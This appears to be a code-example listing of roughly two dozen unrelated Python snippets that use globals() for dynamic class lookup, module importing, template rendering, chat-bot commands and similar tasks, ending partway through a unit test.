Пример #1
0
 def __init__(self, rounds, player_class_names, set_size, starting_hand_size, reporter_class_names):
     """Set up a simulation: resolve player/reporter classes by name and zero scores.

     Player and reporter class names are looked up in this module's global
     namespace, so the named classes must be defined or imported here.
     """
     self.rounds = rounds
     self.set_size = set_size
     self.starting_hand_size = starting_hand_size
     # Instantiate one player per class name, labelled "p0", "p1", ...
     self.players = []
     for num, class_name in enumerate(player_class_names):
         self.players.append(globals()[class_name]("p%d" % num))
     # Reporters take no constructor arguments.
     self.reporters = [globals()[name]() for name in reporter_class_names]
     # Every player starts with an aggregate score of zero.
     self.aggregate_scores = dict.fromkeys(self.players, 0)
Пример #2
0
    def _import_transporter(self, transporter):
        """Imports transporter module and class, returns class.

        Input value can be:
        * a full/absolute module path, like
          "MyTransporterPackage.SomeTransporterClass"
        * a short name, which is resolved under the default transporter
          package prefix.

        Returns the transporter class object, or None (after logging an
        error) when neither the module nor its declared class can be found.
        """
        transporter_class = None
        module = None
        module_name = None
        # Candidate module paths, in order: the name exactly as given (full
        # path support per the docstring), then with the default prefix.
        alternatives = [transporter]
        default_prefix = 'cloud_sync_app.transporter.transporter_'
        if not transporter.startswith(default_prefix):
            alternatives.append('%s%s' % (default_prefix, transporter))
        for module_name in alternatives:
            try:
                module = __import__(module_name, globals(), locals(), ["TRANSPORTER_CLASS"], -1)
                # Stop at the first importable alternative so module_name
                # stays in sync with the module we actually loaded (the
                # original kept looping, leaving module_name pointing at a
                # *failed* alternative for the re-import below).
                break
            except ImportError:
                import traceback
                traceback.print_exc()

        if not module:
            msg = "The transporter module '%s' could not be found." % transporter
            if len(alternatives) > 1:
                msg = '%s Tried (%s)' % (msg, ', '.join(alternatives))
            self.logger.error(msg)
        else:
            # Read the declared class name first, so a missing
            # TRANSPORTER_CLASS attribute cannot leave `classname` unbound
            # in the error path (NameError in the original).
            try:
                classname = module.TRANSPORTER_CLASS
            except AttributeError:
                self.logger.error("The Transporter module '%s' was found, but does not declare TRANSPORTER_CLASS." % module_name)
                return None
            try:
                module = __import__(module_name, globals(), locals(), [classname])
                transporter_class = getattr(module, classname)
            except AttributeError:
                self.logger.error("The Transporter module '%s' was found, but its Transporter class '%s' could not be found." % (module_name, classname))
        return transporter_class
Пример #3
0
def import_pyv8():
    """Make the PyV8 module (and its _PyV8 binary half) available in globals().

    Raises ImportError when PyV8 cannot be located on the module search path.
    """
    # Importing non-existing modules is a bit tricky in Python:
    # if we simply call `import PyV8` and the module doesn't exist,
    # Python will cache this failed import and will always
    # throw an exception even if the module later appears in PYTHONPATH.
    # To prevent this, we manually test whether PyV8.py(c) exists in
    # PYTHONPATH before importing PyV8.
    if 'PyV8' in sys.modules and 'PyV8' not in globals():
        # PyV8 was loaded by ST2, create global alias
        globals()['PyV8'] = __import__('PyV8')
        return

    loaded = False
    # NOTE(review): imp.find_module itself raises ImportError when nothing
    # is found, so the fall-through raise below only fires when a module
    # was located but `f` is None (e.g. a package) — confirm intended.
    f, pathname, description = imp.find_module('PyV8')
    bin_f, bin_pathname, bin_description = imp.find_module('_PyV8')
    if f:
        imp.acquire_lock()
        try:
            # Load the binary extension first so the pure-Python wrapper
            # can import it.
            globals()['_PyV8'] = imp.load_module('_PyV8', bin_f, bin_pathname, bin_description)
            globals()['PyV8'] = imp.load_module('PyV8', f, pathname, description)
            loaded = True
        finally:
            # The original only released the import lock on success, which
            # leaked the lock when load_module raised; always release it,
            # and close the files explicitly since we may exit via an
            # exception.
            imp.release_lock()
            if f:
                f.close()
            if bin_f:
                bin_f.close()

    if not loaded:
        raise ImportError('No PyV8 module found')
Пример #4
0
    def head(self, **KWS):
        """Cheetah-generated template method: render the Google Maps
        <script> block for this site's page head (a map centred on the
        site with a marker and an info window).

        Do not hand-edit the generated body; regenerate from the template.
        """

        ## CHEETAH: generated from #def head at line 5, col 1.
        # Standard Cheetah transaction boilerplate: locate or create the
        # output transaction whose write() receives the rendered text.
        trans = KWS.get("trans")
        if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
            trans = self.transaction # is None unless self.awake() was called
        if not trans:
            trans = DummyTransaction()
            _dummyTrans = True
        else: _dummyTrans = False
        write = trans.response().write
        SL = self._CHEETAH__searchList
        _filter = self._CHEETAH__currentFilter
        
        ########################################
        ## START - generated method body
        
        write(u'''<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false&language=pt-br"></script>
<script type="text/javascript">
  function initialize() {
    var hotel = new google.maps.LatLng(''')
        # $site.latitude / $site.longitude / $site.name are resolved via
        # the Cheetah search list (VFSL) at render time.
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.latitude",True) # u'$site.latitude' on line 9, col 40
        if _v is not None: write(_filter(_v, rawExpr=u'$site.latitude')) # from line 9, col 40.
        write(u''', ''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.longitude",True) # u'$site.longitude' on line 9, col 56
        if _v is not None: write(_filter(_v, rawExpr=u'$site.longitude')) # from line 9, col 56.
        write(u''');
    var myOptions = {
      zoom: 16,
      center: hotel,
      mapTypeId: google.maps.MapTypeId.ROADMAP
    };
    var map = new google.maps.Map(document.getElementById("map_canvas"), myOptions);
    var hotelMarker = new google.maps.Marker({
      position: hotel, 
      map: map, 
      title:"''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.name",True) # u'$site.name' on line 19, col 14
        if _v is not None: write(_filter(_v, rawExpr=u'$site.name')) # from line 19, col 14.
        write(u'''"
\t});
\t
\tvar content = "S\xedtio Tur\xedstico: ''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.name",True) # u'$site.name' on line 22, col 34
        if _v is not None: write(_filter(_v, rawExpr=u'$site.name')) # from line 22, col 34.
        write(u'''<br>"
\tvar infoWindow = new google.maps.InfoWindow({content: content});
\tinfoWindow.setPosition(hotel);
    infoWindow.open(map);
  }

</script>
''')
        
        ########################################
        ## END - generated method body
        
        # With a dummy transaction, hand back the buffered text directly.
        return _dummyTrans and trans.response().getvalue() or ""
Пример #5
0
 def get(self, year, wwuidOrUsername):
     """Look up a single profile for *year* and redirect to its photo URL.

     ``wwuidOrUsername`` is treated as a WWUID when it contains no dot,
     otherwise as a username.  Writes an error payload when zero or more
     than one profile matches.
     """
     # A bare identifier (no ".") is a WWUID; usernames contain a dot.
     if "." in wwuidOrUsername:
         wwuid, username = None, wwuidOrUsername
     else:
         wwuid, username = wwuidOrUsername, None
     # check if we're looking at current photos or not
     is_current = year == self.application.options.current_year
     if is_current:
         if wwuid:
             profile = query_by_wwuid(Profile, wwuid)
         else:
             profile = s.query(Profile).filter_by(username=str(username)).all()
     else:
         # Archived years live in per-year models named Archive<year>.
         archive_model = globals()['Archive' + str(year)]
         if wwuid:
             profile = archive_s.query(archive_model).filter_by(wwuid=str(wwuid)).all()
         else:
             profile = archive_s.query(archive_model).filter_by(username=str(username)).all()
     hits = len(profile)
     if hits == 0:
         self.write({'error': 'no profile found'})
     elif hits > 1:
         self.write({'error': 'too many profiles found'})
     else:
         # Exactly one profile: send the client to its known photo URI.
         self.redirect("https://aswwu.com/media/img-sm/" + str(profile[0].photo))
Пример #6
0
def update(new_info):
    """
    Update the info.

    :param new_info: Either a dict containing the new info or a path/url
                     to a json file containing the new info.
    """
    if isinstance(new_info, basestring):
        # lazy import
        import json
        import mozfile
        handle = mozfile.load(new_info)
        new_info = json.loads(handle.read())
        handle.close()

    info.update(new_info)
    sanitize(info)
    # Mirror every info key as a module-level name.
    globals().update(info)

    # convenience data for os access: isLinux, isWin, isMac, ...
    for candidate in choices['os']:
        globals()['is' + candidate.title()] = (info['os'] == candidate)
    # unix is special
    if isLinux or isBsd:  # noqa
        globals()['isUnix'] = True
Пример #7
0
def get_census_profile(geo_code, geo_level):
    """Build the census profile dict for one geography.

    For every section in PROFILE_SECTIONS that has a matching
    ``get_<section>_profile`` function in this module, compute the section
    for the requested geography and merge in the summary geographies
    (province and/or country).  The DB session is always closed.
    """
    session = get_session()

    try:
        geo_summary_levels = get_summary_geo_info(geo_code, geo_level, session)
        data = {}

        for section in PROFILE_SECTIONS:
            func = globals().get('get_%s_profile' % section)
            if func is None:
                continue
            data[section] = func(geo_code, geo_level, session)

            # get profiles for province and/or country and merge each
            # summary profile into the current geo profile
            for level, code in geo_summary_levels:
                merge_dicts(data[section], func(code, level, session), level)

        # tweaks to make the data nicer: show the largest groups on their
        # own and group the rest as 'Other'
        group_remainder(data['service_delivery']['water_source_distribution'])
        group_remainder(data['service_delivery']['refuse_disposal_distribution'])
        group_remainder(data['service_delivery']['toilet_facilities_distribution'], 5)
        group_remainder(data['demographics']['language_distribution'], 7)

        return data

    finally:
        session.close()
Пример #8
0
def hnd_banl(type, source, parameters):
    """Handle the ban-list command for a groupchat.

    Dispatches to the restore/copy sub-commands when the message body asks
    for them; otherwise sends a MUC admin IQ requesting the 'outcast' list
    and registers the IQ id in the global ``spk_pending`` queue so the
    response handler can match the answer.
    """
    if source[1] not in GROUPCHATS:
        return
    body = parameters.lower()
    nick = source[2]
    groupchat = source[1]
    if body.count(u'вернуть'):
        hnd_getold_list(type, source)
        return
    if body.count(u'копировать'):
        any_copy_banl(type, source, parameters)
        return
    afl = 'outcast'
    iq = xmpp.Iq('get')
    id = 'item' + str(random.randrange(1000, 9999))
    # Register the pending IQ id exactly once (the original appended it
    # twice, leaving a stale duplicate entry in spk_pending).
    globals()['spk_pending'].append(id)
    iq.setTo(groupchat)
    iq.setID(id)
    query = xmpp.Node('query')
    query.setNamespace('http://jabber.org/protocol/muc#admin')
    ban = query.addChild('item', {'affiliation': afl})
    iq.addChild(node=query)
    JCON.SendAndCallForResponse(iq, handler_banlist_answ, {'type': type, 'source': source, 'parameters': parameters})
    return
Пример #9
0
def handler_spisok_iq(type, source, parameters):
    """Request one of the groupchat affiliation lists via a MUC admin IQ.

    The (Russian) keyword in ``parameters`` selects the affiliation —
    owners, admins, members or outcasts.  The IQ id is registered in the
    global ``af_sh`` queue so the response handler can match the answer.

    The original mixed tabs and 8-space indentation (a TabError under
    Python 3); this version uses spaces throughout.
    """
    if not parameters:
        reply(type, source, u'я могу список листов конфы глянуть,только выбери ключ!')
        return
    body = parameters.lower()
    nick = source[2]
    groupchat = source[1]
    afl = ''
    if body.count(u'овнеры') > 0:
        afl = 'owner'
    elif body.count(u'админы') > 0:
        afl = 'admin'
    elif body.count(u'мемберы') > 0:
        afl = 'member'
    elif body.count(u'изгои') > 0:
        afl = 'outcast'
    if afl == '':
        # No recognised keyword: nothing to request.
        return
    iq = xmpp.Iq('get')
    id = 'item' + str(random.randrange(1000, 9999))
    globals()['af_sh'].append(id)
    iq.setTo(groupchat)
    iq.setID(id)
    query = xmpp.Node('query')
    query.setNamespace('http://jabber.org/protocol/muc#admin')
    ban = query.addChild('item', {'affiliation': afl})
    iq.addChild(node=query)
    JCON.SendAndCallForResponse(iq, handler_sp_answ, {'type': type, 'source': source})
Пример #10
0
def main(starter, conf, version=None, just_test=False,
         server_wide_modules=None,
         gevent_script_path=None):
    """Call the `starter` script, dispatching configuration.

    All arguments are set in the standalone script produced by buildout through
    entry point options.

    :param starter: path to the main script source file (currently
      ``openerp-server``)
    :param conf: path to the Odoo configuration file (managed by the recipe)
    :param version: Odoo major version
    :param server_wide_modules: additional server wide modules, to pass with
       the ``--load`` command-line option (ignored if the option is actually
       there on the command line)
    :type version: tuple of integers
    :param just_test: if True, only run unit tests
    :return: the exit code of the started script when it raised SystemExit,
       otherwise None.
    """
    arguments = ['-c', conf]

    if just_test:
        # Pre-6.0 has no 'test' log level.
        arguments.extend(('--log-level',
                          'test' if version >= (6, 0) else 'info',
                          '--stop-after-init'))

        if version >= (7, 0):
            arguments.append('--test-enable')

    if server_wide_modules:
        # Respect an explicit --load from the command line; only append
        # ours when none was given (for/else: runs when no break occurred).
        for opt in sys.argv[1:]:
            if opt.startswith('--load'):
                break
        else:
            arguments.append('--load=' + ','.join(server_wide_modules))

    if '--install-all' in sys.argv:
        sys.argv.remove('--install-all')
        from openerp.tools import config
        # Maybe we should preparse config in all cases and therefore avoid
        # adding the '-c' on the fly ?
        # Still, cautious about pre-6.1 versions
        config.parse_config(['-c', conf])
        from openerp.modules import get_modules
        arguments.extend(('-i', ','.join(get_modules())))

    insert_args(arguments)

    if version >= (8, 0):  # always true in a.r.odoo, but keeping for now
        assert gevent_script_path is not None
        patch_odoo.do_patch(gevent_script_path)

    # Run the starter in-place as if it were executed directly as __main__
    # (Python 2 execfile), from its own directory.
    os.chdir(os.path.split(starter)[0])
    glob = globals()
    glob['__name__'] = '__main__'
    glob['__file__'] = starter
    sys.argv[0] = starter
    try:
        execfile(starter, globals())
    except SystemExit as exc:
        return exc.code
    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        """Resolve the search function, heuristic and problem type by name.

        :param fn: name of a search function in the ``search`` module
        :param prob: name of a ``*Problem`` class in this module's globals
        :param heuristic: name of a heuristic in this module or ``search``
        :raises AttributeError: when any of the names cannot be resolved
        """
        # Warning: some advanced Python magic is employed below to find the right functions and problems

        # Get the search function from the name and heuristic
        # (parenthesised raise and __code__ replace the Python-2-only
        # `raise E, msg` syntax and `func.func_code` attribute).
        if fn not in dir(search):
            raise AttributeError(fn + ' is not a search function in search.py.')
        func = getattr(search, fn)
        if 'heuristic' not in func.__code__.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Note: this bit of Python trickery combines the search algorithm and the heuristic
            self.searchFunction = lambda x: func(x, heuristic=heur)

        # Get the search problem type from the name
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)
Пример #12
0
def _write(root, path, buf, offset, fh):
    """FUSE write handler: run a special-file hook, then write to the fd.

    When ``file_name`` is a special file with a registered ``<name>_write``
    hook in this module's globals, the hook is invoked against the NF's
    hypervisor before the raw (newline-stripped) bytes are written at
    ``offset``.  Returns len(buf) per FUSE convention (only when a hook
    handled the file, matching the original control flow).

    :raises OSError: translated from errors.HypervisorError.
    """
    f_path = full_path(root, path)
    vnfs_ops = VNFSOperations(root)
    file_name = vnfs_ops.vnfs_get_file_name(f_path)
    if file_name in special_files and special_files[file_name]+'_write' in globals():
        try:
            nf_config = get_nf_config(vnfs_ops, f_path)
            # call the custom write function
            logger.info('Writing to ' + file_name  + ' in ' + 
                nf_config['nf_instance_name'] + '@' + nf_config['host'])
            ret_str = globals()[special_files[file_name]+'_write'](vnfs_ops._hypervisor, 
                nf_config, buf.rstrip("\n"))
        # `except E as ex` replaces the Python-2-only `except E, ex` syntax.
        except errors.HypervisorError as ex:
            logger.debug('raised OSError ' + str(ex.errno))
            raise OSError(ex.errno, os.strerror(ex.errno))
        logger.info('Successfully wrote ' + file_name + 
            ' in ' + nf_config['nf_instance_name'] + '@' + nf_config['host'])

        os.lseek(fh, offset, os.SEEK_SET)
        os.write(fh, buf.rstrip("\n"))
        return len(buf)
Пример #13
0
def parsemodel(name):
    """Dynamically define an XSPEC model class called *name* and install it
    in this module's globals.

    The generated class reads its parameter metadata from
    ``XSPEC_MODULE_PATH/<name>.dat1`` and ``.dat2`` at instantiation time.
    """
    parsestring = """
class %(name)s(basemodel):
    _repr_expr='%(name)s'
    def __init__(self):
        self.pardata1 = open(XSPEC_MODULE_PATH+'/%(name)s.dat1', 'r').readlines()
        self.pardata2 = open(XSPEC_MODULE_PATH+'/%(name)s.dat2', 'r').readlines()
        basemodel.__init__(self)
        for lines in self.pardata1:
            self.parameters.append(parameter(lines.split()))
        for par in self.parameters:
            par.model=repr(self)
            par.group=0
        for lines in self.pardata2:
            linestr=lines.split()
            (numbkey, index, comp, modelname, parname, unit) = linestr[:6]
            self.__dict__[parname] = self.parameters[int(index)-1]
            self.__dict__[parname].name=parname
            self.__parameter_names__.append(parname)
            try:float(unit)
            except:self.__dict__[parname].unit=unit
        self.parlength=len(self.parameters)
    #def update(self):
        #for pars in [x for x in self.parameters if x.group == 0]:
            #object.__setattr__(self, pars.name, pars)
""" % {'name':name}
    # Exec into an explicit namespace: relying on exec filling the caller's
    # locals() is undefined inside a function in Python 3 (locals() is a
    # snapshot there), so `locals()[name]` would raise KeyError.  Module
    # globals are passed so the class body can see basemodel & friends.
    namespace = {}
    exec(parsestring, globals(), namespace)
    clsobj = namespace[name]
    globals()[name] = clsobj
Пример #14
0
def init():
    """Prepare the Galaxy runtime for this maintenance script.

    Normalises the CLI options, makes the Galaxy source tree importable,
    loads the configuration file and builds the object store.

    :return: a ``(model_mapping, object_store, db_scheme)`` tuple, where
      db_scheme is the database connection scheme (e.g. ``sqlite``).
    """
    options.config = os.path.abspath( options.config )
    # 'all' is a CLI convention here meaning "do not filter on this field".
    if options.username == 'all':
        options.username = None
    if options.email == 'all':
        options.email = None

    # Run relative to the Galaxy root so 'lib' and relative paths resolve.
    os.chdir( os.path.dirname( options.config ) )
    sys.path.append( 'lib' )

    from galaxy import eggs
    import pkg_resources

    import galaxy.config
    from galaxy.objectstore import build_object_store_from_config

    # lazy
    globals()['nice_size'] = __import__( 'galaxy.util', globals(), locals(), ( 'nice_size', ) ).nice_size

    config_parser = ConfigParser( dict( here = os.getcwd(),
                                        database_connection = 'sqlite:///database/universe.sqlite?isolation_level=IMMEDIATE' ) )
    config_parser.read( os.path.basename( options.config ) )

    config_dict = {}
    for key, value in config_parser.items( "app:main" ):
        config_dict[key] = value

    config = galaxy.config.Configuration( **config_dict )
    object_store = build_object_store_from_config( config )

    from galaxy.model import mapping

    return mapping.init( config.file_path, config.database_connection, create_tables = False, object_store = object_store ), object_store, config.database_connection.split(':')[0]
Пример #15
0
def readMesh(fn):
    """Read a nodes/elems model from file.

    Returns a dict which may contain 'coords', 'elems' and 'esets' entries,
    depending on the sections found in the file.  (The original docstring
    claimed an (x,e) tuple or None, which did not match the code.)
    """
    d = {}
    pf.GUI.setBusy(True)
    fil = open(fn, 'r')
    try:
        for line in fil:
            if line[0] == '#':
                line = line[1:]
            # getParams() injects e.g. filename/mode/nplex/offset into
            # module globals; the bare names below read those globals.
            globals().update(getParams(line))
            dfil = open(filename, 'r')
            try:
                if mode == 'nodes':
                    d['coords'] = readNodes(dfil)
                elif mode == 'elems':
                    elems = d.setdefault('elems', [])
                    e = readElems(dfil, int(nplex)) - int(offset)
                    elems.append(e)
                elif mode == 'esets':
                    d['esets'] = readEsets(dfil)
                else:
                    print("Skipping unrecognized line: %s" % line)
            finally:
                dfil.close()
    finally:
        # Always clear the busy cursor and close the input file — the
        # original leaked both when a reader raised.
        pf.GUI.setBusy(False)
        fil.close()
    return d
Пример #16
0
    def getargs(self,moduleName,className,method) :
        '''
          This will return the list of arguments in a method of python module of class.
          It accepts method list as an argument.

          Returns a dict mapping method name -> list of positional argument
          names, or False as soon as one requested method is missing.
        '''
        print "Message : Argument list is being obtained for each method"
        methodArgsDict = {}
        if className == None:
            # Module-level functions: import the module by its *last* dotted
            # component, with the parent component in fromlist.
            # NOTE(review): level=-1 relies on Python 2 implicit relative
            # imports; verify the intended module is actually found.
            moduleList = moduleName.split(".")
            for index,name in enumerate(method) :
                Module = __import__(moduleList[len(moduleList) -1], globals(), locals(), [moduleList[len(moduleList) -2]], -1)
                try :
                    names = vars(Module)[name]
                except KeyError:
                    print "Message : method '" + name + "'does not exists,Continued with including it. "
                    return False
                # getargspec(...)[0] is the list of positional arg names.
                argumentList = inspect.getargspec(names) #inspect.getargvalues(name)
                methodArgsDict[name] = argumentList[0]
        else :
            # Class methods: import with the class in fromlist, then look
            # each method up on the class itself.
            moduleList = moduleName.split(".")
            for index,name in enumerate(method) :
                Module = __import__(moduleList[len(moduleList) - 1], globals(), locals(), [className], -1)
                Class = getattr(Module, className)
                try :
                    names = vars(Class)[name]
                except KeyError :
                    print "Message : method '" + name + "'does not exists,Continued with include it."
                    return False

                argumentList = inspect.getargspec(names) #inspect.getargvalues(name)
                methodArgsDict[name] = argumentList[0]

        return methodArgsDict
Пример #17
0
  def onReload(self, moduleName="SegmentCAD"):
    """Generic reload method for any scripted module: re-import the module
    source in place and rebuild its widget inside the existing parent.

    ModuleWizard will substitute the correct default moduleName.
    """
    import imp, sys, os, slicer
    
    widgetName = moduleName + "Widget"

    # reload the source code
    # - set source file path
    # - load the module to the global space
    filePath = eval('slicer.modules.%s.path' % moduleName.lower())
    p = os.path.dirname(filePath)
    if not sys.path.__contains__(p):
      sys.path.insert(0,p)
    fp = open(filePath, "r")
    globals()[moduleName] = imp.load_module(
        moduleName, fp, filePath, ('.py', 'r', imp.PY_SOURCE))
    fp.close()

    # rebuild the widget
    # - find and hide the existing widget
    # - create a new widget in the existing parent
    # parent = slicer.util.findChildren(name='%s Reload' % moduleName)[0].parent()
    parent = self.parent
    for child in parent.children():
      try:
        child.hide()
      except AttributeError:
        pass
    # Instantiate <Module>Widget from the freshly loaded module and store
    # it under a lowercase alias in this module's globals, then set it up.
    globals()[widgetName.lower()] = eval(
        'globals()["%s"].%s(parent)' % (moduleName, widgetName))
    globals()[widgetName.lower()].setup()
Пример #18
0
def main():
    """Entry point for the `changes` CLI: parse arguments, validate the
    project, prompt for a new version where appropriate, and dispatch to
    the selected command's module-level function."""
    arguments = initialise()

    version_arguments = ['--major', '--minor', '--patch']
    commands = ['release', 'changelog', 'run_tests', 'bump_version', 'tag',
                'upload', 'install', 'pypi']
    suppress_version_prompt_for = ['run_tests', 'upload']

    if arguments['--new-version']:
        arguments['new_version'] = arguments['--new-version']

    module_name = config.arguments['<module_name>']

    if not probe.probe_project(module_name):
        raise Exception('Project does not meet `changes` requirements')

    # Dispatch: each command name maps to a same-named function in globals.
    for command in commands:
        if not arguments[command]:
            continue
        if command not in suppress_version_prompt_for:
            # Commands that publish need a (possibly prompted) new version.
            arguments['new_version'] = version.get_new_version(
                module_name,
                version.current_version(module_name),
                arguments.get('--noinput', False),
                **util.extract_arguments(arguments, version_arguments)
            )
        globals()[command]()
Пример #19
0
    def getmethods(self,modulePath,Class) :
        '''
         This will get the list of methods in given module or class.
         It accepts the module path and class name. If there is no
         class name then it has be mentioned as None.

         Side effects: stores the discovered class names in self.ClassList
         and the method list in self.method.  Returns the method/function
         name list (empty when the import or lookup failed).
        '''
        methodList = []
        moduleList = modulePath.split("/")
        # NOTE(review): newModule is computed but never used below — the
        # import works off the last path component only; confirm intended.
        newModule = ".".join([moduleList[len(moduleList) - 2],moduleList[len(moduleList) - 1]])
        print "Message : Method list is being obatined , Please wait ..."
        try :
            if Class :
                # Import with the class in fromlist (level=-1 => Python 2
                # implicit relative import), then read its __dict__.
                Module = __import__(moduleList[len(moduleList) - 1], globals(), locals(), [Class], -1)
                ClassList = [x.__name__ for x in Module.__dict__.values() if inspect.isclass(x)]
                self.ClassList = ClassList
                Class = vars(Module)[Class]
                methodList = [x.__name__ for x in Class.__dict__.values() if inspect.isfunction(x)]
            else :
                # Module-level functions only.
                Module = __import__(moduleList[len(moduleList) - 1], globals(), locals(),[moduleList[len(moduleList) - 2]], -1)
                methodList = [x.__name__ for x in Module.__dict__.values() if inspect.isfunction(x)]
                ClassList = [x.__name__ for x in Module.__dict__.values() if inspect.isclass(x)]
                self.ClassList = ClassList
        except :
            # Bare except: any import/lookup failure is reported and an
            # empty method list is returned.
            print "Error : " +str(sys.exc_info()[1])


        self.method = methodList
        return self.method
Пример #20
0
    def do_GET(self):
        """Serve the local OAuth helper endpoints.

        /code    — exchange the received authorization code for a token
        /routes  — list the public methods of the LinkedIn application
        <route>  — invoke the named application method (when authenticated)
        Any other path before authentication opens the authorization URL
        (once) in the browser.
        """
        parsedurl = urlparse(self.path)
        # Authenticated once the client holds an access token.
        authed = type(liw.authentication.token) is not NoneType

        if parsedurl.path == '/code':
            self.json_headers()

            liw.authentication.authorization_code = params_to_d(self.path).get('code')
            self.wfile.write(dumps({'access_token': liw.authentication.get_access_token(),
                                    'routes': filter(lambda d: not d.startswith('_'), dir(liw.application))}))
        elif parsedurl.path == '/routes':
            self.json_headers()

            self.wfile.write(dumps({'routes': filter(lambda d: not d.startswith('_'), dir(liw.application))}))
        elif not authed:
            self.json_headers()

            # Only pop the browser tab on the first unauthenticated hit.
            if not globals()['run_already']:
                open_new_tab(liw.authentication.authorization_url)
            globals()['run_already'] = True
            self.wfile.write(dumps({'path': self.path, 'authed': type(liw.authentication.token) is NoneType}))
        elif authed and len(parsedurl.path) and parsedurl.path[1:] in dir(liw.application):
            self.json_headers()
            self.wfile.write(dumps(getattr(liw.application, parsedurl.path[1:])()))
        else:
            self.json_headers(501)
            self.wfile.write(dumps({'error': 'NotImplemented'}))
Пример #21
0
def main(argv=None):
    """clipon CLI entry point: parse the global options, then dispatch to
    the matching `do_<command>` handler using its `<command>_doc` usage
    string (both looked up by naming convention in module globals)."""
    # parse the command line
    args = docopt(main_doc,
                  version='clipon version %s' % __version__,
                  options_first=True,
                  argv=argv or sys.argv[1:])
    cmd = args['<command>']
    argv = [args['<command>']] + args['<options>']

    if cmd == 'help':
        do_help(argv)
        return

    try:
        # parse the options for subcommand
        cmd_args = docopt(globals()[cmd + '_doc'], argv)

        # call the subcommand handler
        handler = globals()['do_' + cmd]
        assert callable(handler)
        handler(cmd_args)
    except (KeyError, AssertionError):
        # Unknown command name (missing doc/handler) or non-callable handler.
        exit("%r is not a clipon command. See 'clipon help or clipon -h'." % cmd)
Пример #22
0
def check_expression(expr, var_symbols):
    """Does eval(expr) both in Sage and SymPy and does other checks.

    The expression is evaluated in two namespaces built from this module's
    globals plus sage.__dict__ resp. sympy.__dict__, and the two results
    are asserted to convert into each other (sympy.S / sage.SR).
    """
    # evaluate the expression in the context of Sage:
    if var_symbols:
        sage.var(var_symbols)
    a = globals().copy()
    # safety checks: 'sin' must come from sage, not leak from our globals
    assert not "sin" in a
    a.update(sage.__dict__)
    assert "sin" in a
    e_sage = eval(expr, a)
    assert not isinstance(e_sage, sympy.Basic)

    # evaluate the expression in the context of SymPy:
    if var_symbols:
        sympy.var(var_symbols)
    b = globals().copy()
    assert not "sin" in b
    # (the original updated b with sympy.__dict__ twice; once is enough)
    b.update(sympy.__dict__)
    assert "sin" in b
    e_sympy = eval(expr, b)
    assert isinstance(e_sympy, sympy.Basic)

    # Do the actual checks:
    assert sympy.S(e_sage) == e_sympy
    assert e_sage == sage.SR(e_sympy)
Пример #23
0
def help(player, string):
    """Display help a console command.

    With an argument, print that command's docstring to the chat; without
    one, list all callable console commands (minus the ignore list).
    """
    if string:
        try:
            func = globals()[string]
            if callable(func) and func.__doc__:
                for s in func.__doc__.split('\n'):
                    FantasyDemo.addChatMsg(-1, s)

            else:
                # The original raised a *string* exception, which is a
                # TypeError since Python 2.6; raise a real exception type
                # (it is swallowed by the handler below either way).
                raise TypeError('Not callable')
        except:
            FantasyDemo.addChatMsg(-1, 'No help for ' + string)

    else:
        # List every callable global except the ignored helpers, sorted.
        # (sorted()/comprehensions replace the py2-only list-returning
        # filter() plus in-place keys.sort().)
        ignoreList = ('getV4FromString', 'help')
        keys = sorted(k for k in globals().keys()
                      if callable(globals()[k]) and k not in ignoreList)
        FantasyDemo.addChatMsg(-1, '/help {command} for more info.')
        # Render the list without brackets and quotes.
        string = ''.join(c for c in str(keys) if c not in '[]\'"')
        FantasyDemo.addChatMsg(-1, string)
Пример #24
0
    def _create(self, name, params):
        """Dispatch an ``<Class>.create`` call: validate the arguments,
        create the object and run any ``after_<Class>_create`` hook.

        SR.create and VLAN.create have argument counts different from the
        generic two-argument create.  Returns the new object's ref.
        """
        self._check_session(params)
        is_sr_create = name == 'SR.create'
        is_vlan_create = name == 'VLAN.create'
        # Storage Repositories have a different API
        expected = 10 if is_sr_create else (4 if is_vlan_create else 2)
        self._check_arg_count(params, expected)
        (cls, _) = name.split('.')
        # Explicit if/elif replaces the original `and/or` chain, which
        # would silently fall through to _create_object whenever a creator
        # returned a falsy ref.
        if is_sr_create:
            ref = _create_sr(cls, params)
        elif is_vlan_create:
            ref = _create_vlan(params[1], params[2], params[3])
        else:
            ref = _create_object(cls, params[1])

        # Call hook to provide any fixups needed (ex. creating backrefs)
        after_hook = 'after_%s_create' % cls
        if after_hook in globals():
            globals()[after_hook](ref, params[1])

        obj = get_record(cls, ref)

        # Add RO fields
        if cls == 'VM':
            obj['power_state'] = 'Halted'

        return ref
Пример #25
0
def exec_func(name, *args, **kwargs):
    """Look up *name* in module globals and call it as
    ``func(options, *args, **kwargs)`` with warnings silenced.

    :raises ValueError: when no global of that name exists.
    """
    # `in` and a parenthesised raise replace the removed dict.has_key()
    # method and the Python-2-only `raise ValueError, name` syntax.
    if name not in globals():
        raise ValueError(name)
    func = globals()[name]
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        return func(options, *args, **kwargs)
Пример #26
0
    def test_reusable_scope(self):
        """A `let` scope re-injects its (possibly updated) bindings each
        time it is entered, and strips them from the frame on exit.

        NOTE(review): the a/b/c/d names are added/removed in this frame by
        the `let` context manager itself, so renaming any local here would
        change what the test exercises — leave names as-is.
        """
        scope = let(a="tacos", b="soup", c="cake")
        d = "godzilla"

        with scope:
            # Inside the scope the let-bindings are visible alongside the
            # pre-existing local d.
            self.assertEquals(a, "tacos")
            self.assertEquals(b, "soup")
            self.assertEquals(c, "cake")
            self.assertEquals(d, "godzilla")

            a = "fajita"
            b = "stew"
            d = "mothra"

        # On exit the let-managed names are gone again; plain locals (d)
        # and the frame's globals are untouched.
        self.assertFalse("a" in locals())
